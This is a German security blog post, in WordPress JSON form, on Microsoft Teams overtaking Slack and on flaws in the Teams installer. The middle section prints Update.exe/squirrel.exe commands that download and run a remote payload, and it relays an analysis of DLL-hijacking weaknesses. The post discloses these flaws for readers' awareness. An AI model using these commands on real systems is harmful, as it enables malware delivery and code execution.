{"id":220538,"date":"2019-07-15T00:13:00","date_gmt":"2019-07-14T22:13:00","guid":{"rendered":"https:\/\/www.borncity.com\/blog\/?p=220538"},"modified":"2020-01-19T23:57:50","modified_gmt":"2020-01-19T22:57:50","slug":"teams-erfolgreich-aber-ein-sicherheits-gau","status":"publish","type":"post","link":"https:\/\/borncity.com\/blog\/2019\/07\/15\/teams-erfolgreich-aber-ein-sicherheits-gau\/","title":{"rendered":"Teams: Erfolgreich, aber ein Sicherheits-GAU"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" style=\"float: left; margin: 0px 10px 0px 0px; display: inline;\" src=\"https:\/\/borncity.com\/blog\/wp-content\/uploads\/2015\/01\/Schutz.jpg\" width=\"40\" height=\"47\" align=\"left\" \/>Microsofts Teams hat gerade Slack in den Nutzerzahlen \u00fcberholt. Das wird nun weltweit in Blogs und IT-Magazinen abgefeiert. Aber das Produkt hat auch seine Schattenseiten, sicherheitstechnisch hat Microsoft mal wieder einen GAU verbrochen.<\/p>\n<p><!--more--><\/p>\n<h2>Teams \u00fcberholt Slack<\/h2>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/vg05.met.vgwort.de\/na\/27eb38dbc081425cb78cfc12f0a2e02d\" alt=\"\" width=\"1\" height=\"1\" \/>Teams ist, wie Slack, ein Collaborations-Werkzeug, in dem Menschen im Gesch\u00e4ftsumfeld kommunizieren k\u00f6nnen (Chat, Besprechungen, Notizen etc.). Teams wird inzwischen mit Microsoft Office365 ausgeliefert. Mittelfristig soll Teams sogar Microsoft Skype (fr\u00fcher Lync) ersetzen (siehe <a href=\"https:\/\/borncity.com\/blog\/2019\/05\/05\/microsoft-ersetzt-skype-for-business-durch-teams\/\">Microsoft ersetzt Skype for Business durch Teams<\/a>). Und Teams hat inzwischen 13 Millionen Nutzer t\u00e4glich, mehr als der Konkurrent Slack. Heise hat sich beispielsweise in <a href=\"https:\/\/www.heise.de\/newsticker\/meldung\/Microsoft-Teams-ueberholt-Slack-4468772.html\" target=\"_blank\" rel=\"noopener noreferrer\">diesem Artikel<\/a> am Thema abgearbeitet. Sch\u00f6ne neue Welt \u2026<\/p>\n<h2>Teams kann zum Malware-Download benutzt werden<\/h2>\n<p>Es ist bereits einige Tage her, dass ich auf <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/microsoft-teams-can-be-used-to-download-and-run-malicious-packages\/\" target=\"_blank\" rel=\"noopener noreferrer\">diesen Artikel<\/a> von Bleeping Computer gesto\u00dfen bin. Da klingelte sofort was bei mir \u2013 dazu sp\u00e4ter mehr. Der Artikel bei Bleeping Computer adressiert den Umstand, dass die Update-Funktion von Teams in der Desktop-Anwendung das Herunterladen und Ausf\u00fchren beliebiger Dateien auf dem System erm\u00f6glicht.<\/p>\n<blockquote><p>Das gleiche Problem betrifft \u00fcbrigens auch die Updater der Clients von GitHub, WhatApp und UiPath Software f\u00fcr Desktop-Computer.<\/p><\/blockquote>\n<p>Diese Anwendungen basieren alle auf dem Open-Source-Projekt <a href=\"https:\/\/github.com\/Squirrel\/Squirrel.Windows\" target=\"_blank\" rel=\"noopener noreferrer\">Squirrel<\/a> zur Verwaltung von Installations- und Aktualisierungsroutinen, das mit dem <a href=\"https:\/\/docs.microsoft.com\/en-us\/nuget\/what-is-nuget\" target=\"_blank\" rel=\"noopener noreferrer\">NuGet-Paketmanager<\/a> die notwendigen Dateien erstellt. Auch da klingelte was bei mir.<\/p>\n<p>Mehrere Sicherheitsforscher weisen aber darauf hin, dass es mit dem Befehl \"update\" m\u00f6glich ist, eine beliebige Bin\u00e4rdatei im Kontext des aktuellen Benutzers auszuf\u00fchren. Das Gleiche gilt f\u00fcr \"<em>squirrel.exe<\/em>\". Mit Microsoft Teams l\u00e4sst eine Malware als Payload von einer Webserver herunterladen, in einen Ordner speichern, und automatisch mit einem der folgenden Befehle ausf\u00fchren:<\/p>\n<pre><code>Update.exe --update [url to payload]\r\nsquirrel.exe --update [url to payload]<\/code><\/pre>\n<p>Die Befehle k\u00f6nnen mit anderen Argumenten verwendet werden, was den download einer Nutzlast in Form eines NuGet-Pakets von einem Remote-Standort aus erm\u00f6glicht.<\/p>\n<pre><code>Update.exe --download [url to payload]\r\nsquirrel.exe --download [url to payload]<\/code><\/pre>\n<p>Oder die folgenden Befehl werden verwendet, um Schadsoftware remote herunterzuladen und auszuf\u00fchren:<\/p>\n<pre><code>Update.exe --updateRollback [url to payload]\r\nsquirrel.exe --updateRollback [url to payload]<\/code><\/pre>\n<p>Sicherheitsforscher <a href=\"https:\/\/twitter.com\/reegun21\" target=\"_blank\" rel=\"noopener noreferrer\">Reegun Richard<\/a> hat das Problem in Microsoft Teams am 4. Juni an Microsoft gemeldet.<\/p>\n<blockquote class=\"twitter-tweet\" data-lang=\"de\">\n<p dir=\"ltr\" lang=\"en\">Found another vulnerable parameter where Microsoft Teams do remote download and execute.<\/p>\n<p>Vulnerable parameter :<br \/>\nupdate.exe &#8211;updateRollback=URL to package<br \/>\nsquirrel.exe &#8211;updateRollback=URL to package<a href=\"https:\/\/t.co\/4oFCyXkfxa\">https:\/\/t.co\/4oFCyXkfxa<\/a><\/p>\n<p>CC:<a href=\"https:\/\/twitter.com\/MrUn1k0d3r?ref_src=twsrc%5Etfw\">@MrUn1k0d3r<\/a> <a href=\"https:\/\/twitter.com\/Hexacorn?ref_src=twsrc%5Etfw\">@Hexacorn<\/a> <a href=\"https:\/\/twitter.com\/Oddvarmoe?ref_src=twsrc%5Etfw\">@Oddvarmoe<\/a> <a href=\"https:\/\/twitter.com\/hashtag\/blueteam?src=hash&amp;ref_src=twsrc%5Etfw\">#blueteam<\/a> <a href=\"https:\/\/twitter.com\/hashtag\/redteam?src=hash&amp;ref_src=twsrc%5Etfw\">#redteam<\/a><\/p>\n<p>\u2014 Reegun (@reegun21) <a href=\"https:\/\/twitter.com\/reegun21\/status\/1145747723661897728?ref_src=twsrc%5Etfw\">1. Juli 2019<\/a><\/p><\/blockquote>\n<p><script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script><\/p>\n<p>Am 1. Juli 2019 machte er das Ganze \u00f6ffentlich, w\u00e4hrend Microsoft den Sicherheitsforscher dar\u00fcber informierte, dass die Behebung in einer zuk\u00fcnftigen Version der Software erfolgen w\u00fcrde. Weitere Details zum Thema lassen sich bei <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/microsoft-teams-can-be-used-to-download-and-run-malicious-packages\/\" target=\"_blank\" rel=\"noopener noreferrer\">Bleeping Computer<\/a> nachlesen.<\/p>\n<h2>Microsoft, die k\u00f6nnen es einfach nicht<\/h2>\n<p>An dieser Stelle k\u00f6nnte man das Thema abhaken und sich wieder schlafen legen. Dass Microsoft sicherheitstechnisch patzt, ist bekannt. Die blasen zwar m\u00e4chtig die Backen wegen Microsoft Defender ATP &amp; Co. auf und verticken da auch t\u00fcchtig Lizenzen an Firmen. Aber unter der Haube vieler Produkte tun sich sicherheitstechnische Abgr\u00fcnde auf \u2013 der obige Fall zeigt mal wieder, wo der Barthel bei Microsoft den Most holt.<\/p>\n<p>Aber ich habe noch einen Pfeil im K\u00f6cher. Das Thema 'Sicherheits-GAU Teams' d\u00fcmpelt hier seit Juli 2018. Kam nur nie dazu, das mal aufzubereiten \u2013 und dann war das Zeitfenster f\u00fcr einen Artikel vorbei. Aber jetzt hole ich das Ganze mal flugs aus dem Keller.<\/p>\n<p>Im Juli 2018 hat Microsoft auch Teams for Free freigegeben (die .exe mit dem Installer ist <a href=\"https:\/\/statics.teams.microsoft.com\/production-windows\/1.1.00.18052\/Teams_windows.exe\" target=\"_blank\" rel=\"noopener noreferrer\">hier herunterladbar<\/a>). Stefan Kanthak hat sich den Installer f\u00fcr diese Version angesehen und mir einige interessante Einblicke gew\u00e4hrt. Ich poste mal hier den O-Ton Kanthak, frisch und ungefiltert:<\/p>\n<blockquote><p>Dieses Programm habe ich heruntergeladen und dann NUR dessen Metadaten angesehen; ich habe es NICHT ausgefuehrt:<\/p>\n<p>1. es hat STATISCHE Abhaengigkeiten zu URLMon.dll, Version.dll etc.<\/p>\n<p>Das sind in den Windows-Versionen, fuer die das Installations-<br \/>\nprogramm gefrickelt wurde, KEINE \"known DLLs\" -&gt; DLL hijacking<\/p><\/blockquote>\n<p>Mit den obigen Zeilen umschreibt Stefan Kathak den Umstand, dass der Installer bei der Ausf\u00fchrung (mit Rechten des Benutzers) die genannten Bibliotheksdateien l\u00e4dt. Da es keine 'known DDLs', die Windows von festen Pfaden l\u00e4dt, braucht eine Malware nur eigene Dateien mit den Namen dieser DLLs im Application-Ordner oder Systemordner (%SystemRoot%\\System32\\) abzulegen. Schon wird diese Datei bei der Installation von Microsoft Teams geladen.\u00a0<em>Teams_windows.exe<\/em> l\u00e4uft dabei mit den Rechten des Aufrufers. Sobald aber der von diesem Modul heruntergeladene Web-Installer f\u00fcr das<br \/>\nveraltete .NET Framework 4.5.2 sowie das aus dem als RCDATA-Ressource mitgef\u00fchrten ZIP-Archiv entpackte nuGet-Paket samt Squirrel starten (siehe unten), werden diese mit Administratorrechten ausgef\u00fchrt.<\/p>\n<p>Da das unprivilegiert laufende <em>Teams_windows.exe diese<\/em> Dateien<br \/>\nnicht vor \u00c4nderungen durch den unprivilegierten Benutzer sch\u00fctzen kann, kann dieser die Dateien zwischen Herunterladen\/Entpacken und Aufruf modifizieren. Noch einfacher ist, DLLs, die vom Web-Installer oder nuGet\/Squirrel aus deren \"application directory\" geladen und mit erh\u00f6hten Rechten ausgef\u00fchrt werden, dorthin zu kopieren. Aber die Geschichte geht noch weiter:<\/p>\n<blockquote><p>2. in der STRINGTABLE von Teams_windows.exe steht folgende URL:<br \/>\n&lt;<a href=\"http:\/\/go.microsoft.com\/fwlink\/?LinkId=397707\" target=\"_blank\" rel=\"noopener noreferrer\">http:\/\/go.microsoft.com\/fwlink\/?LinkId=397707<\/a>&gt;<\/p>\n<p>Dahinter verbirgt sich der Web-Installer des .NET Framework 4.5.2:<br \/>\n&lt;<a href=\"http:\/\/download.microsoft.com\/download\/9\/A\/7\/9A78F13F-FD62-4F6D-AB6B-1803508A9F56\/51209.34209.03\/web\/NDP452-KB2901954-Web.exe\" target=\"_blank\" rel=\"noopener noreferrer\">http:\/\/download.microsoft.com\/download\/9\/A\/7\/9A78F13F-FD62-4F6D-AB6B-1803508A9F56\/51209.34209.03\/web\/NDP452-KB2901954-Web.exe<\/a>&gt;<br \/>\nwie anhand der URL unschwer zu erkennen ist ,wird dieser ueber<br \/>\neinen UNSICHEREN Kanal heruntergeladen&#8230;<\/p>\n<p>3. eine RCDATA-Ressource von Teams_windows.exe enthaelt ein ZIP-Archiv, in dem eine Update sowie eine Teams-1.1.00.18052-full.nupkg<br \/>\nenthalten sind, d.h. das Installationsprogramm ist (mal wieder) ein von irgendwelchen VOELLIG ahnungslosen Trotteln selbstgestrickter Selbst-Extraktor.<\/p>\n<p>.nupkg ist das Paketformat von nuGET, einer Abscheulichkeit aus dem<br \/>\n.NET-Umfeld.<\/p>\n<p>4. da der Selbst-Extraktor mit Benutzerrechten laeuft kann er das<br \/>\nZIP-Archiv NICHT in einem geschuetzten Verzeichnis auspacken<br \/>\n-&gt; ein unprivilegierter Benutzer kann beliebigen Unfug anstellen.<\/p>\n<p>5. Update.exe ist ein .NET-Programm (daher muss Teams_windows.exe<br \/>\ndas .NET Framework vor der eigentlichen Installation herunterladen<br \/>\nund installieren), also laedt es eine Profiler-DLL aus einem vom<br \/>\nunprivilegierten Benutzer angegebenen Pfad.<br \/>\n-&gt; ein unprivilegierter Benutzer kann beliebigen Unfug anstellen.<\/p>\n<p>Der interne Name dieses Update.exe ist \"Squirrel.app\"; ich argwoehne,<br \/>\ndas es von hier &lt;<a href=\"https:\/\/github.com\/Squirrel\/Squirrel.Windows\" target=\"_blank\" rel=\"noopener noreferrer\">https:\/\/github.com\/Squirrel\/Squirrel.Windows<\/a>&gt; stammt.<\/p><\/blockquote>\n<p>Unter 3 bis 5 f\u00fchrt Kanthak die Klippen auf, die in obigem Beitrag von einem weiteren Sicherheitsforscher jetzt an Microsoft gemeldet wurden.<\/p>\n<p>&nbsp;<\/p>\n<p>Stefan Kanthak schrieb mir, dass seine Analyse hat knapp 5 Minuten gedauert, und wie erwartet 3 blutigste Anf\u00e4ngerfehler gezeigt habe. Er meinte, dass das Schreiben seiner Mail hat doppelt so lange wie die Analyse brauchte.<\/p>\n<p>Ja, ich gebe jetzt den Erbsenz\u00e4hler und die Spa\u00dfbremse gleicherma\u00dfen. Aber diese Episode l\u00e4sst nur den Schluss zu, das bei Microsoft zu viele K\u00f6che am Brei r\u00fchren und diesen ziemlich verderben. Oder platt ausgedr\u00fcckt: Microsoft kann es einfach nicht \u2013 aber feiert mal weiter die 'Erfolge von Teams' \u2013 wie hei\u00dft es so sch\u00f6n 'Der Brunnen kommt solange zum Krug, bis er sich erbricht' \u2013 oder so.<\/p>\n<p><strong>\u00c4hnliche Artikel:<\/strong><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2019\/06\/24\/schwere-sicherheitslcke-in-dells-pc-doctor-assistant\/\">Schwere Sicherheitsl\u00fccke in Dells PC-Doctor-Assistant<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2019\/05\/05\/microsoft-ersetzt-skype-for-business-durch-teams\/\">Microsoft ersetzt Skype for Business durch Teams<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2019\/01\/24\/windows-tool-userbenchmark-finger-eher-davon-lassen\/\">Windows-Tool UserBenchMark \u2013 Finger eher davon lassen<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2018\/12\/21\/microsoft-will-office-installer-schwachstelle-nicht-schlieen\/\">Microsoft will Installer-Schwachstelle nicht schlie\u00dfen<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2018\/11\/27\/dos-schwachstelle-in-microsoft-skype-for-business\/\">DoS-Schwachstelle in Microsoft Skype for Business<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2018\/11\/21\/sicherheitslcken-in-intels-rapid-storage-technology\/\">Sicherheitsl\u00fccken in Intels Rapid Storage Technology<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Microsofts Teams hat gerade Slack in den Nutzerzahlen \u00fcberholt. Das wird nun weltweit in Blogs und IT-Magazinen abgefeiert. Aber das Produkt hat auch seine Schattenseiten, sicherheitstechnisch hat Microsoft mal wieder einen GAU verbrochen.<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[426],"tags":[4328,5595],"class_list":["post-220538","post","type-post","status-publish","format-standard","hentry","category-sicherheit","tag-sicherheit","tag-teams"],"_links":{"self":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/220538","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/comments?post=220538"}],"version-history":[{"count":0,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/220538\/revisions"}],"wp:attachment":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/media?parent=220538"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/categories?post=220538"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/tags?post=220538"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}